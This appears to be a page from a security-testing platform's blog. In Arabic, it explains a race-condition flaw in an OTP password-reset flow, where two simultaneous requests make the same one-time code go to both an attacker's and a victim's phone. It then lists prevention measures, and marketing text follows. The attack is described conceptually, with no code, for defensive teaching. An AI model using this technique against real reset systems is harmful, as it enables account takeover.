<h2>تخيل وضعًا حيث يسمح تطبيق ويب للمستخدمين بإعادة تعيين كلمات مرورهم عن طريق استلام كلمة مرور مرة واحدة (OTP) وكان هناك عيب في حالة التنافس في النظام، مما فتح الباب أمام الهجمات. هكذا كان يعمل: عندما يطلب شخص ما إعادة تعيين كلمة مروره، يقوم التطبيق بإرسال كلمة مرور مرة واحدة إلى رقم هاتفهم. ومع ذلك، بسبب ثغرة حالة التنافس، يمكن للمهاجم الماهر استغلال هذا الضعف. سيرسل المهاجم طلبين معًا في نفس الوقت: أحدهما باستخدام رقم هاتفهم الخاص والآخر باستخدام رقم هاتف الضحية. من خلال إرسال هذه الطلبات في نفس الوقت بالضبط، يمكنهم خداع النظام لإرسال نفس كلمة المرور مرة واحدة إلى كلا الرقمين.</h2>

&nbsp;

<h2>الوقاية من ثغرات حالة التنافس: للحد من ثغرات حالة التنافس في تطبيقك، اتبع هذه الإرشادات:</h2>

<ol>
	<li>فصل مصادر البيانات: تجنب خلط البيانات من مصادر مختلفة لتجنب الصراعات والتناقضات.</li>
	<li>تنفيذ عمليات ذرية: استخدم ميزات التوافقية التي توفرها متجر البيانات الخاص بك لضمان حدوث التغييرات في الحالة بشكل ذري. يساعد هذا في الحفاظ على سلامة البيانات ومنع حالات التنافس.</li>
	<li>الاستفادة من فحوصات النزاهة: استفد من ميزات النزاهة والاتساق في متجر البيانات الخاص بك، مثل قيود الفريدية للأعمدة، لإضافة طبقة إضافية من الحماية.</li>
	<li>تنويع طبقات التخزين: الاعتماد على طبقة تخزين واحدة، مثل الجلسات، ليس كافيًا. تجنب تأمين طبقة واحدة بطبقة أخرى ونفذ إجراءات أمنية إضافية.</li>
	<li>الحفاظ على اتساق الجلسة: تأكد من أن إطار التعامل مع الجلسات الخاص بك يحافظ على الاتساق الداخلي. تجنب تحديث متغيرات الجلسة بشكل فردي، حيث يمكن أن يؤدي ذلك إلى تعريض الثغرات.</li>
</ol>

يمكن لتنفيذ هذه الخطوات الاحترازية أن يقلل بشكل كبير من احتمالية مواجهة ثغرات حالة التنافس في تطبيقك.

Race-Condition-Vulnerability

Race conditions are like those unexpected moments when you have multiple people trying to access the same thing at the same time, causing chaos and confusion. In the world of websites, this can happen when requests are processed concurrently without proper precautions. It's like a collision of threads, where different tasks are trying to interact with the

يمكن أن تحدث هذه الحالة عندما تتم معالجة الطلبات بشكل متزامن دون احتياطات مناسبة. إنها مثل تصادم المسارات، حيث تحاول المهام المختلفة التفاعل مع نفس البيانات في نفس الوقت.

One platform to detect, manage and fix security vulnerabilities

Increase your resistance to attack by tapping the world’s top ethical hackers.

Trusted by industry leaders

products

Continuous Security testing Platform

Trustline Assessment

Trustline Assessment

Trustline Review

Trustline Review

products

Continuous Security testing Platform

Trustline Assessment

Trustline Assessment

Trustline Review

Trustline Review

Methodology

Go from insights to action

High flexibility in managing account balance. Invest in security in a way that suits your budget.

Out of scope

Resolved

Under Review

Triage you can count on

Talents you can trust

Active Programs

Active Programs

The program is under review

Be a step ahead of cyber attack. Gain a comprehensive insight into the trending vulnerabilities nowadays.

How it works

Continuous security for your expanding digital assets

Define your project

Leverage a pool of unrivaled skills

Validate and prioritize

Remediate faster

POWERED BY HACKERS

Hack, learn and earn for good

Resources

Explore our latest articles

Pivoting Technique

August 26, 2024

You're Doing Penetration Testing Wrong!

June 4, 2024

Receive the most up-to-date Trustline content directly in your email inbox